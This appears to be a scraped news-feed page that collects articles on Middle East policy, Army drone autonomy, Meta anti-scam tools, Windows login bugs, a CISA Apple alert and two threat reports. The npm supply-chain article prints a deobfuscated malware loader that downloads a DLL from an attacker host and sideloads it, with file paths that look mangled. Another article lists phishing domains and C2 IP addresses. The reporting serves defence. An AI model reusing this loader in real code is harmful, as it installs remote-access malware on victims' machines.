1010.cx

  • Now is not the time for new US commitments to the Middle East

    ·

    To seal the recent Gaza peace deal, President Donald Trump asked Arab states to, once again, find a compromise with Israel. Despite Trump’s promises to the contrary, they had to accept seriously watered-down language on a future Palestinian state and a partial, rather than full, Israeli withdrawal from Gaza. Coming on the heels of Israel’s missile strike on Doha that also rattled Arab states, Trump may now feel all the more pressure to appease the United States’ Arab partners, like he did last month when he offered a formal security guarantee to Qatar (a first for any state in the Middle East) to quiet Arab doubts about U.S. reliability as a security partner. 

    Are more U.S. pledges now on the way?

    Saudi Arabia is pushing for a U.S. security deal, but taking on new commitments isn’t worth the real and potential costs to U.S. interests. Instead, Trump needs to stay focused on the heart of the problem and maintain pressure on Israel to curb its regional aggression. Coupled with Arab states shouldering the burden of their own security, pressure like this is best for ending conflict in the region.

    The United States has a bad habit of making new commitments to states in the Middle East when it wants to either expand or maintain regional order and peace. New pledges are the goodies Washington hands out to keep everyone in—or sometimes to expand—the fold.

    With the Abraham Accords, for instance, the United States committed sales of F-35 fighter jets, recognition of disputed territories, and financial support to get the United Arab Emirates, Bahrain, Sudan, and Morocco to normalize relations with Israel. Those pledges essentially greased the wheel for greater regional cooperation.

    Encouraging cooperation is a good thing, but not when it comes at the expense of U.S. national security, which the Trump administration must now put front and center as it considers how to manage relations with Arab states today.

    The United States is already overcommitted to the Middle East. It maintains upwards of 50,000 troops there (that’s up by nearly half since Hamas’ October 7 attack on Israel) despite the waning significance of the region to the United States.

    The two main strategic drivers of U.S. deep engagement in the Middle East over the last five decades—oil and terrorism—are no longer major strategic challenges. The U.S. is now a net exporter of oil, meaning it no longer depends on the region’s fossil fuels; and with the defeat of the ISIS caliphate in 2019 and general weakening of al-Qaeda, the terrorism threat can be mostly handled by local actors.

    In short, Washington is giving the Middle East far too much. It shouldn’t now give even more to tamp down frustrations over the Gaza deal and the Doha strike, or more broadly to try to bring some permanent, transformative fix to the troubled region, which appears to be Trump’s greater ambition. Rather than step deeper into the Middle East, Washington needs to step back. 

    Under similar circumstances, President Joe Biden considered giving Saudi Arabia a NATO-like security guarantee to get Riyadh to come onboard with the Abraham Accords. Riyadh asked for the pledge because, similar to Qatar today, the United States provided no military defense of Saudi Arabia after a 2019 attack by Yemen’s Houthi rebels on two Saudi oil refineries. Right on cue, Biden offered up the security pledge to grease the wheels of regional cooperation.

    Trump just followed Biden’s playbook with Qatar—and might follow that playbook again with new security pledges across the region to appease Arab states post-Gaza and expand the Abraham Accords. This makes little sense, given limited U.S. interests in the Middle East; and it runs counter to the Trump administration’s own strategy of shifting forces out of the region to focus attention on Asia and the Western Hemisphere where the United States has far more at stake. More commitments mean the forces stay too to uphold those commitments.

    Trump needs to make clear to the Qataris the limits of this new pledge, and avoid doling out more of them to other Arab partners. This would not only help the United States, but would likely benefit the Middle East too. The U.S. decision not to defend Saudi Arabia militarily after the Houthi attack in 2019 forced Riyadh to recognize that it had to bear more of the burden of its own security. The result? It ended its brutal, costly military operations in Yemen. This isn’t an isolated case. From Iran to post-Assad Syria, we’ve seen other similar instances of peace and stability when the U.S. draws back.

    Trump should also maintain pressure on Tel Aviv (which he finally used to push Israel into the Gaza peace deal) to tone down its regional aggression. As opposed to doling out goodies, this has worked best to calm Middle East tensions of late. Keeping that pressure up now will help tame regional strikes, like Doha, that led Trump to make the pledge to Qatar in the first place.

    In general, Trump can get the regional stability and order he wants in the Middle East by doing less, not more. Stepping back, rather than stepping farther into, the Middle East just makes sense.

    Will Walldorf is a Professor at Wake Forest University and Senior Fellow at Defense Priorities.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Army wants drones that understand ‘commander’s intent’

    ·

    Cheap, self-driving drones that don’t require a whole fire team to launch them are a cornerstone of the Army’s forthcoming UAS strategy, which will focus on “universal interoperability and autonomy,” according to the service’s top aviator.

    The service’s next generation of drone training and operation will include a new military occupational specialty that merges operators and maintainers, as well as a new advanced course that standardizes training across the force. Right now, they’re looking for software that will enable drones to take orders rather than be flown.

    “You know, gone are the days where a drone operator is actually being a pilot, where they have to be hands on the sticks all the time,” Maj. Gen. Clair Gill said at last week’s AUSA annual meeting in Washington, D.C. “Now we've got autonomous capability where we can even use large language models to tell it what to do — but we basically program it, tell it what to do, and then, you know, the algorithms, in a very disciplined fashion, execute it.”

    Right now, it takes four soldiers to launch a drone ambush, the deputy commanding general of the 101st Airborne Division said, with one flying it, one pulling security, someone carrying the equipment, and someone setting up antennas.

    But “that’s the wrong math,” Brig. Gen. Travis McIntosh said on the same panel. “Let me give you a threshold that's easy to understand: when we can fly drones by command, not by pilot. When your drones can understand commander's intent—that, ladies and gentlemen, is the threshold for AI autonomy to help us.”

    McIntosh’s soldiers recently debuted a homegrown drone dubbed Attritable Battle Field Enabler 101—or ABE, named after the “screaming eagle” mascot of the 101st. Instead of the $2,500-a-pop commercial drones on the market, McIntosh said, his troops are training on this cheaper $740 model.

    Now they need a software program that can fly the drone and help it make decisions about where to drop grenades.

    “We've also laid the foundation today for an uncrewed vehicle control software capability that's able to provide common software interface, common view, if you will, and common control to UAS across the board,” said Brig. Gen. David Phillips, head of the Army’s Program Executive Office for aviation.

    At the same time, Gill said, the Army has finished a draft of its forthcoming UAS strategy.

    Some changes already underway include a new MOS, 15X, that will combine the 15W drone operator and 15E drone maintainer jobs.

    “I can't overstate or underscore enough the cultural shift that had to take place for these 15-series soldiers, because the 15X is designed to be embedded in maneuver elements, so they need to be able to operate in the same capacity as [those] combat arms soldiers standing next to them,” he said.

    Gill’s team at Fort Rucker, Alabama, has also developed what they’re calling the UAS Advanced Lethality Course, where soldiers from backgrounds in infantry, artillery, cyber, Special Forces, armor and more will learn how to operate drones with the Army’s latest doctrine. 

    “We're getting ready to run our second iteration,” he said. “As soon as we get the government going again, we're ready to export that course.”

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework

    ·

    , ,

    The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets targeting open-source supply chains.

    Positioning itself as a formidable alternative to established tools like Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.

    This October, researchers uncovered its delivery through the npm package registry—a supply chain attack targeting developers and organizations reliant on Node.js modules for critical infrastructure and application development.

    The incident revolved around a deceptive npm package named https-proxy-utils, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent.

    The threat actors cloned proxy-related features from popular modules, ensuring the malicious package appeared both useful and harmless.

    Upon installation, however, the package executed a post-install script designed to download and deploy the AdaptixC2 agent onto the victim’s system, initiating a stealthy foothold for remote access and broader exploitation.

    Securelist researchers were the first to identify and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.

    As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring of open-source components.

    Infection Mechanism: OS-Specific Adaptation

    A standout feature of the AdaptixC2 npm campaign is its tailored infection strategy for multiple operating systems. Once the malicious package executes, it detects the host OS and deploys the payload using methods designed for Windows, macOS, or Linux.

    For Windows, the code sideloads the agent as a DLL alongside a legitimate executable, using JavaScript scripting to spawn the compromised process.

    Metadata for the malicious (left) and legitimate (right) packages (Source – Securelist)

    Below is a deobfuscated snippet employed for Windows deployment:-

    async function onWindows() {
  const url = 'https://cloudcenter.topsysupdate';
  const dllPath = 'C:\\.dll';
  const systemMsdtc = 'C:\\32.exe';
  const tasksMsdtc = 'C:\\.exe';
  try {
    await downloadFile(url, dllPath);
    fs.copyFileSync(systemMsdtc, tasksMsdtc);
    const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });
    child.unref();
  } catch (err) {
    console.error(err);
  }
}

    This flexible approach extends across macOS and Linux systems, employing autorun configuration and architecture-specific binary delivery to ensure persistent control.

    Such OS-targeted infection routines deepen the framework’s ability to evade conventional detection, broadening its scope for exploitation across diverse environments.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Pakistani Threat Actors Targeting Indian Govt. With Email Mimic as ‘NIC eEmail Services’

    ·

    , ,

    A sophisticated phishing campaign orchestrated by Pakistan-linked threat actors has been discovered targeting Indian government entities by impersonating the National Informatics Centre’s email services.

    The operation, attributed to APT36, also known as TransparentTribe, leverages social engineering tactics to compromise sensitive government infrastructure through deceptive email communications designed to appear as legitimate NIC eEmail Services correspondence.

    The campaign employs carefully crafted phishing lures that mimic official government communication channels, exploiting the trust associated with NIC’s established email infrastructure.

    By masquerading as authentic government correspondence, the threat actors aim to trick officials into divulging credentials or downloading malicious payloads.

    This targeting strategy demonstrates the group’s deep understanding of Indian government communication protocols and their continued focus on intelligence gathering operations against Indian administrative and defense sectors.

    Cyber Team analysts identified the malicious infrastructure supporting this campaign, uncovering a network of fraudulent domains and command-and-control servers designed to facilitate credential harvesting and data exfiltration.

    The operation represents a continuation of APT36’s long-standing espionage activities against Indian government targets, reflecting the group’s persistent interest in compromising sensitive governmental communications.

    Infrastructure and Technical Indicators

    The attack infrastructure reveals a multi-layered command-and-control framework centered around the fraudulent domain accounts.mgovcloud[.]in.departmentofdefence[.]live, which closely mimics legitimate government cloud services.

    The primary malicious domain departmentofdefence[.]live serves as the foundation for the phishing operation, while IP address 81.180.93[.]5 operates as a stealth server with C2 functionality accessible on port 8080.

    Additional infrastructure includes IP 45.141.59[.]168, providing redundancy and resilience to the adversary’s command-and-control network.

    This sophisticated setup enables the threat actors to maintain persistent access while evading detection through a distributed infrastructure that complicates attribution and takedown efforts.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Pakistani Threat Actors Targeting Indian Govt. With Email Mimic as ‘NIC eEmail Services’ appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • How Threat Intelligence Can Save Money and Resources for Businesses

    ·

    ,

    Cybersecurity is not just about defense; it is about protecting profits. Organizations without modern threat intelligence (TI) face escalating breach costs, wasted resources, and operational inefficiencies that hit the bottom line.

    Actionable intel can help businesses cut costs, optimize workflows, and neutralize risks before they escalate.​

    Security operations centers (SOCs) suffer from inefficiency and burnout without high-fidelity TI. Analysts manually sift through thousands of alerts, many of which are false positives, wasting time and budgets while overlooking real threats.

    This reactive chaos leads to high turnover, with false positives costing enterprises up to $1.3 million annually in labor alone, and burnout making staff twice as likely to seek new jobs.​

    Undetected threats turn into financial disasters, exploiting visibility gaps and slow responses. Generic TI feeds often miss evasive attacks, allowing breaches to cause downtime, fines, and lost trust.

    The global average breach cost in 2025 is $4.44 million, with U.S. organizations facing $10.22 million, while nearly one in five small and medium-sized businesses (SMBs) could close after a successful attack.​

    Compliance gaps invite fines and legal risks, as regulators demand proactive threat documentation. Without real-time TI, audits reveal shortcomings, triggering penalties like GDPR’s up to 4% of global revenue or €20 million, and HIPAA violations exceeding $1.5 million per incident.​

    Five Strategies for Cost Savings with Threat Intelligence

    TI prevents breaches early through feeds providing real-time data on indicators of compromise (IOCs). ANY.RUN’s Threat Intelligence Feeds deliver actionable intel from over 15,000 SOC investigations, blocking threats at the source and avoiding multimillion-dollar recoveries.

    ​Preventing Breaches Proactively

    Threat intelligence (TI) stops breaches early by delivering real-time IOC feeds that integrate with firewalls and EDR tools for automated blocking of threats like malicious domains.

    Platforms such as ANY.RUN provides 24 times more IOCs from global SOC data, enabling quick risk isolation and reducing breach likelihood by up to 70% through predictive attacker insights.​

    Eliminating False Positive Waste

    TI filters alerts by enriching them with context on threat actors and TTPs, cutting investigation time on benign events and alleviating alert fatigue that wastes 30% of analyst hours.

    ANY.RUN’s TI Lookup prioritizes high-risk threats via SIEM integrations, saving up to 50% in labor by focusing teams on verified dangers rather than noise.​

    Cutting Labor Costs Through Automated Triage

    Automated TI triage uses APIs to connect with SOAR and EDR, providing instant sandbox context to reduce manual escalations and empower junior analysts.

    ANY.RUN’s SDK automates artifact enrichment, minimizing turnover and overtime while boosting SOC capacity by 20-30% without additional hires.​

    Accelerating Response to Limit Damage

    TI speeds incident response with full attack visibility from single IOCs, shortening MTTR by 40-60% through sandbox reports on malware behaviors.

    ANY.RUN’s feeds link to detailed analyses, enabling precise containment that cuts downtime costs—up to $100,000 per hour—and prevents revenue loss from prolonged incidents.​

    Maintaining Up-to-Date Defenses Effortlessly

    Continuous TI updates deliver real-time, 99% unique IOCs with MITRE ATT&CK mappings, automating adaptations to evolving threats like ransomware without manual effort.

    ANY.RUN’s query notifications keep defenses proactive, reducing breach risks by 50% and avoiding costs from outdated static feeds.​

    It eliminates false positive waste by filtering alerts for verified threats. ANY.RUN’s solutions cut noise, saving hours on triage and redirecting budgets to high-impact tasks, reducing alert fatigue that plagues teams.​

    Automated triage lowers labor costs via seamless integrations. ANY.RUN’s API and SDK connect with SIEM, SOAR, and EDR tools, enriching alerts instantly and minimizing escalations, thus avoiding overtime and hiring needs.​

    Faster responses minimize fallout, with TI providing full attack context from sandbox analyses. ANY.RUN’s TI Lookup offers instant IOC enrichment, shortening mean time to respond (MTTR) and limiting downtime losses.​

    Continuous updates future-proof defenses without manual effort. ANY.RUN’s feeds refresh in real time with 99% unique IOCs, integrating MITRE ATT&CK mappings to adapt to evolving threats proactively.​

    An international transport firm battled phishing and malware by adopting ANY.RUN’s TI Lookup for automated tracking of geo-targeted threats and CVEs.

    Custom queries and real-time updates enabled quick rule creation, slashing manual research and boosting detection speed. The result: blocked attacks preemptively, optimized resources, and enhanced proactive defenses against shifting attacker tactics.​

    Threat intelligence like ANY.RUN’s TI Feeds and Lookup transforms security from a cost center into a profit protector.

    Build Stronger Security With Fresh TI Data From 500,000 Analysts => Try Now

    The post How Threat Intelligence Can Save Money and Resources for Businesses appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft Confirms Recent Updates Cause Login Issues on Windows 11 24H2, 25H2, and Windows Server 2025

    ·

    , , ,

    Microsoft has acknowledged a significant authentication problem affecting users of recent Windows versions, stemming from security enhancements in updates released since late August 2025.

    The company detailed how these updates are triggering Kerberos and NTLM failures on devices sharing identical Security Identifiers (SIDs), leading to widespread login disruptions across enterprise networks.

    This issue, now officially documented, highlights the trade-offs between bolstering security and maintaining compatibility in cloned or duplicated systems.​

    Windows Operating Systems Affected

    Affected users on Windows 11 version 24H2, version 25H2, and Windows Server 2025 report a range of frustrating symptoms following the installation of updates like KB5064081 on August 29, 2025, and KB5065426 on September 9, 2025.

    Common issues include repeated credential prompts despite entering valid information, with error messages such as “Login attempt failed,” “Your credentials didn’t work,” or “There is a partial mismatch in the machine ID.”

    Network access breaks down as well, preventing connections to shared folders via IP or hostname and blocking Remote Desktop Protocol (RDP) sessions, even those routed through Privileged Access Management (PAM) tools or third-party software.

    Failover Clustering operations halt with “access denied” errors, complicating high-availability setups in data centers. Event Viewer logs reveal critical clues, including SEC_E_NO_CREDENTIALS in the Security log and Local Security Authority Server Service (lsasrv.dll) Event ID 6167 in the System log, signaling a machine ID mismatch that suggests ticket manipulation or session discrepancies.

    These problems have surfaced prominently in virtual desktop infrastructure (VDI) environments, such as those using Citrix MCS, where multiple machines derived from the same image share SIDs, exacerbating authentication breakdowns during RDP or file sharing.​

    At the heart of this disruption lies a deliberate security upgrade in the updates, which now rigorously verifies SIDs during authentication handshakes to prevent unauthorized access.

    Microsoft explains that duplicate SIDs, often resulting from improper cloning of Windows installations without the Sysprep tool, are no longer tolerated under this new regime.

    Sysprep ensures SID uniqueness, a requirement Microsoft has long recommended for duplicating OS images, but the August updates enforce it more stringently, blocking interactions between affected devices.

    This change aligns with Microsoft’s policy against unsupported disk duplication methods, which can propagate identical SIDs across networks, posing risks in enterprise settings.

    While intended to enhance protection against potential exploits, the enforcement has caught many IT teams off guard, particularly in scenarios involving rapid VM deployments or legacy imaging practices.​

    For immediate relief, IT administrators can deploy a specialized Group Policy to mitigate the authentication blocks, though this requires contacting Microsoft Support for business to obtain it.

    However, Microsoft suggests that the definitive solution involves rebuilding impacted devices using approved cloning procedures that incorporate Sysprep, ensuring each system generates a unique SID.

    Organizations relying on tools like VMware or Citrix for VDI provisioning may need to revise their workflows to comply, potentially delaying updates until imaging processes are updated.

    As of October 21, 2025, no broader patch has been rolled out, but Microsoft continues monitoring reports from affected users. ​

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Microsoft Confirms Recent Updates Cause Login Issues on Windows 11 24H2, 25H2, and Windows Server 2025 appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Meta Launches New Tools to Protect Messenger and WhatsApp Users from Scammers

    ·

    ,

    Meta announced innovative tools on Tuesday to shield users of Messenger and WhatsApp from scammers. The updates, revealed during Cybersecurity Awareness Month, aim to detect suspicious activity in real-time and empower users with better account protections.

    This comes as scammers increasingly target vulnerable groups, including older adults, through messaging apps and social platforms.

    Since the start of 2025, Meta’s teams have disrupted nearly 8 million accounts linked to global scam centers operating from regions like Myanmar, Laos, Cambodia, the UAE, and the Philippines.

    These networks exploit dating apps, social media, and crypto channels to deceive victims. The FBI’s 2024 Internet Crime Report highlighted the scale of the problem, noting that Americans over 60 lost $4.8 billion to fraud last year alone. Criminals often build trust to compromise accounts, then prey on contacts for further scams.

    Enhanced detection features are key to Meta’s response. On WhatsApp, a new warning now alerts users when sharing their screen during video calls with unknown contacts, a common tactic scammers use to extract sensitive details like bank information or verification codes.

    For Messenger, advanced AI-driven scam detection is in testing: it flags potentially fraudulent messages from new contacts, offers to review chats, and provides tips on blocking or reporting. Users receive details on common schemes and recommended actions if a scam is identified.

    Meta is also promoting passkeys across Facebook, Messenger, and WhatsApp for seamless, biometric logins using fingerprints, faces, or PINs, reducing reliance on vulnerable passwords.

    Security Checkup on Facebook and Instagram reviews settings and suggests updates, while WhatsApp’s Privacy Checkup helps users manage group invites and other privacy options.

    Beyond tools, Meta shared scam trends uncovered with Graphika researchers. Watch for fake home remodeling or debt relief sites luring seniors with phony government benefits via ads on Facebook and Google.

    Fraudulent “money recovery” services mimic the FBI’s IC3 site, while impostor customer support pages hijack brand comments to push refunds through DMs or forms.

    To stay safe, Meta advises caution with unsolicited messages never share personal or financial data and verifying issues through official channels.

    Families can assist by discussing red flags like urgency or secrecy, and resources from AARP’s Fraud Watch Network or the FTC offer reporting options.

    Meta is deepening collaborations, joining the National Elder Fraud Coordination Center alongside AARP, Amazon, Google, and others to tackle elder fraud through shared intelligence and investigations.

    As part of the Tech Against Scams Coalition, it recently dismantled scam-linked Facebook Groups with Match Group. Globally, initiatives include training Thai seniors on digital literacy and awareness campaigns in Europe and India featuring local creators.

    These efforts underscore Meta’s commitment to evolving defenses against cross-border threats, with ongoing updates to keep users ahead of scammers.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Meta Launches New Tools to Protect Messenger and WhatsApp Users from Scammers appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Today’s D Brief: EU backs Ukraine peace talks; AUKUS, back on; AI in Europe; NNSA idles most staff; And a bit more.

    ·

    A swarm of Russian drones shut down the electric grid in parts of Ukraine Tuesday, leaving hundreds of thousands without power—a sign of more blackouts to come this winter. Russia has mounted attacks on civilian infrastructure since it first invaded Ukraine in 2022, and such strikes are expected to grow more frequent as temperatures drop in coming weeks and months. 

    What’s new: “Analysts and officials say that this year Moscow has shifted tactics, targeting specific regions and gas infrastructure,” AP reports

    European leaders back White House stance on Ukraine. Leaders from across Europe, including the European Union, Britain, France, Germany, and Ukraine, penned a joint statement Tuesday, calling for a ceasefire and more pressure on Russia’s economy. “We are all united in our desire for a just and lasting peace, deserved by the people of Ukraine. We strongly support President Trump’s position that the fighting should stop immediately, and that the current line of contact should be the starting point of negotiations,” leaders wrote in the statement issued by the British government. “We must ramp up the pressure on Russia’s economy and its defence industry, until Putin is ready to make peace.” Read the statement, here.

    Asia-Pacific

    AUKUS is back on after a monthslong review by the Pentagon sparked uncertainty. President Donald Trump, who earlier this year appeared not to know about the trilateral deal, assuaged concerns about the submarine deal’s future, saying U.S. production was “full steam ahead” during a meeting with Australian Prime Minister Anthony Albanese on Monday. “They’re building magnificent holding pads for the submarines. It’s going to be expensive. You wouldn’t believe the level of complexity and how expensive it is,” Trump said. Australia has committed billions of dollars for the deal and its alliance is considered critical for stability in the Indo-Pacific region. 

    Minerals deal. The White House and Australia also signed a critical minerals deal, agreeing to put up $1 billion together in the next six months, according to a White House summary of the deal. Albanese said Australia has $8.5 billion in the pipeline for the arrangement and about $50 billion in resources are estimated to be recovered, NBC reported

    The rare-earth minerals deal comes ahead of a fraught White House meeting with Chinese President Xi Jinping next week. On Oct. 9, China “announced sweeping new rare earth export controls on Thursday, tightening global access to critical raw materials required for computer chips and defense technology,” as the Washington Post put it. One day later, Trump responded with a threat to levy new 100-percent tariffs on Chinese goods, starting Nov. 1 “or earlier.” 

    Trump also threatened to cancel his meeting with Xi, which could be strained further by Taiwan discussions. But the president insisted to reporters that China wasn’t interested in invading Taiwan, but noted the topic would likely come up, Reuters reported. “China doesn't want to do that,” Trump said, per Politico. “We have the best of everything and nobody is going to mess with that…I think we'll end up with a very strong trade deal. Both of us will be happy.”

    Beijing: Hey, the US is spying on us. China accused the National Security Agency of hacking its sensitive systems that keep standard time for defense, finance, and telecommunications sectors. Read more, here

    Welcome to this Tuesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Bradley Peniston and Lauren C. Williams. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. This day in 1960 saw the maiden flight of the W2F-1, the prototype for the E-2 Hawkeye carrier-­based airborne early warning aircraft still in service today.

    AI in Europe

    Two European nations embrace AI governance to keep safe. The governments of Estonia and Ukraine are racing ahead to harness artificial intelligence, which they believe is crucial to building societies that can fend off Russian assaults—whether by missiles or denial-of-service attacks, Defense One’s Patrick Tucker reports

    “Estonia knows what it means to live on the digital frontline. AI gives us an advantage that size alone cannot. This is why we have an AI strategy for defense and a Force Transformation Command within the Estonian Defense Forces. With industry, startups, and the military working side by side, we move from idea to field faster,” Estonian Prime Minister Kristen Michal told an audience of international technology executives and government officials. “Russia’s war has made one thing clear: the side that can integrate technology faster has the advantage. Ukraine has shown it. So, while supporting them in every way, we also learn from them.” This means more than buying AI tools and services, he said: it means completely rethinking governmental structure and function. More details, here.

    Around the US

    NNSA furloughs most of its staff. The Trump administration furloughed 1,400 employees of the National Nuclear Security Administration on Monday as payroll funds ran out and the shutdown entered its third week. “About 400 NNSA employees will continue working without pay to secure the nuclear stockpile and maintain minimum safety conditions,” Federal News Network reported Monday. Energy Secretary Chris Wright: “This has never happened before.” Politico has background, here.

    Border relocation. House Democrats want to know why Homeland Security moved key cyber workers to the border. The Monday letter — led by Rep. James Walkinshaw, D-Va., and also signed by Reps. Suhas Subramanyam, D-Va., Eugene Vindman, D-Va., and Shontel Brown, D-Ohio, along with Del. Eleanor Holmes Norton, D-D.C. — argues that DHS violated the Antideficiency Act when it conducted a reduction in force during the government shutdown. The agency has also moved to reassign Cybersecurity and Infrastructure Security Agency staff to roles within Immigration and Customs Enforcement, the Federal Protective Service and Customs and Border Protection. Get the full story here.

    ICYMI: Many communications satellites don’t encrypt their traffic, study finds. Wired: “With just $800 in basic equipment, researchers found a stunning variety of data—including thousands of T-Mobile users’ calls and texts and even US military communications—sent by satellites unencrypted.” Read on, here.

    ]]>

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • CISA Warns of Apple macOS, iOS, tvOS, Safari, and watchOS Vulnerability Exploited in Attacks

    ·

    , , ,

    The Cybersecurity and Infrastructure Security Agency (CISA) has issued a high-priority alert about a critical vulnerability in multiple Apple products.

    Tracked as CVE-2022-48503, this unspecified issue in the JavaScriptCore engine could allow attackers to execute arbitrary code simply by processing malicious web content. The flaw affects macOS, iOS, tvOS, Safari, and watchOS, putting millions of users at risk of remote exploitation.

    First disclosed in 2022, the vulnerability has resurfaced in active attacks, according to CISA’s Known Exploited Vulnerabilities (KEV) catalog. Security researchers note that while Apple patched it in subsequent updates, unpatched or end-of-life (EoL) systems remain prime targets.

    “This isn’t just a relic of the past threat actors are weaponizing old bugs against outdated devices,” said a CISA spokesperson in the advisory.

    The agency emphasized that the vulnerability’s severity stems from its potential for full system compromise, enabling data theft, ransomware deployment, or further malware spread.

    Although no direct ties to ransomware campaigns have been confirmed, the unknown exploitation history underscores the urgency for immediate action.

    Widespread Impact on Apple’s Ecosystem

    The vulnerability’s broad reach spans Apple’s core operating systems and browser. JavaScriptCore, the engine powering Safari and other web rendering in iOS, macOS, tvOS, and watchOS, processes dynamic web elements like scripts and animations.

    An attacker could craft a booby-trapped webpage or email link to trigger the flaw, bypassing traditional defenses. Older devices, such as those running iOS 15 or earlier macOS versions, are particularly vulnerable if they haven’t received updates.

    CISA warns that end-of-service (EoS) products no longer supported by Apple offer no patch path, leaving users exposed indefinitely.

    For cloud-integrated services, CISA references Binding Operational Directive (BOD) 22-01, urging federal agencies and critical infrastructure operators to apply mitigations or retire affected systems.

    Private users face similar risks, especially in hybrid work environments where personal Apple devices handle sensitive data.

    CISA’s directive is clear: Update to the latest vendor-patched versions immediately. Apple released fixes in security updates dating back to early 2023, but users must verify their systems via Settings > General > Software Update.

    If mitigations aren’t feasible, particularly for EoL hardware, the agency advises discontinuing use to avoid exploitation. Network defenders should monitor for anomalous JavaScript activity and enforce endpoint detection rules targeting code execution attempts.

    Recent reports indicate that attacks on Apple platforms are surging by 20% year over year, making staying vigilant non-negotiable. Organizations delaying patches risk cascading breaches, while individuals should prioritize updates to safeguard their digital lives.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post CISA Warns of Apple macOS, iOS, tvOS, Safari, and watchOS Vulnerability Exploited in Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Meta Rolls Out New Tools to Protect WhatsApp and Messenger Users from Scams

    ·

    Meta on Tuesday said it’s launching new tools to protect Messenger and WhatsApp users from potential scams. To that end, the company said it’s introducing new warnings on WhatsApp when users attempt to share their screen with an unknown contact during a video call so as to prevent them from giving away sensitive information like bank details or verification codes. On Messenger, users can opt to

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶